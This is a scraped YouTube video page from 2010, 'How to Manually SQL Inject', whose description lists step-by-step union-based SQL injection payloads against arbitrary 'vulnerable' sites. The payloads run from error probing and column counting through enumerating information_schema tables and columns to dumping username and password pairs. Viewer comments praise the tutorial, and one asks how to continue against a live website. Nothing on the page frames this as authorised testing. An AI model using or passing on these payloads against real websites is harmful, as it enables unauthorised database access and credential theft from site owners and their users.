How to Manually SQL Inject

Loading...

3,436

Loading...

Sign in or sign up now!

Uploaded by PhiberOptics on Nov 19, 2010

Steps to Manually SQL Injecting:

1. Find a vulnerable add a ' at the end of the site example: news.php?id=1 add a ' at the end of the 1 and see if you get a syntax error
2. order by 1--
3. union all select 1,2,3,4,5--
4. @@version in vulnerable column
5. union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
6. union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=char(x)--
7. union all select 1,2,3,4,group_concat(username,0x3a,password,0x3c62723e) from column_name--

Side note may need to add a - between like the *.php?id=-#

Category:

Tags:

License:

Standard YouTube License

10 likes, 1 dislikes

Uploader Comments (PhiberOptics)

Lololooololol

CerealMS 1 year ago
@CerealMS Aslong as a bring a laugh or enjoyment to someone in the world then it makes my life happy :P Glad you got a laugh.

PhiberOptics 1 year ago 3

see all

All Comments (9)

Sign In or Sign Up now to post a comment!

Thx mate, nice tut :)

alexturry 1 week ago
Click click click :D

Ksernx 3 months ago
Dude you rule this is the best tutorial evar!!

sktchysk8r 6 months ago
good tut

BrookParkour 7 months ago
Dude you are fucking awesome. MUCH better tutorial than all the others. Cheers

ElayneTrakand 9 months ago
what if the website is vunerable because it gave error when i put ' at the end and i have gone past order by 30-- or something like order by 30/* and it still hasn't give me a error? should i keep going ?

oliverxboxable 1 year ago
Cool

darysmer 1 year ago

Loading...

0 / 00Unsaved Playlist Return to active list

Your queue is empty. Add videos to your queue using this button:
or sign in to load a different list.

Loading...Saving...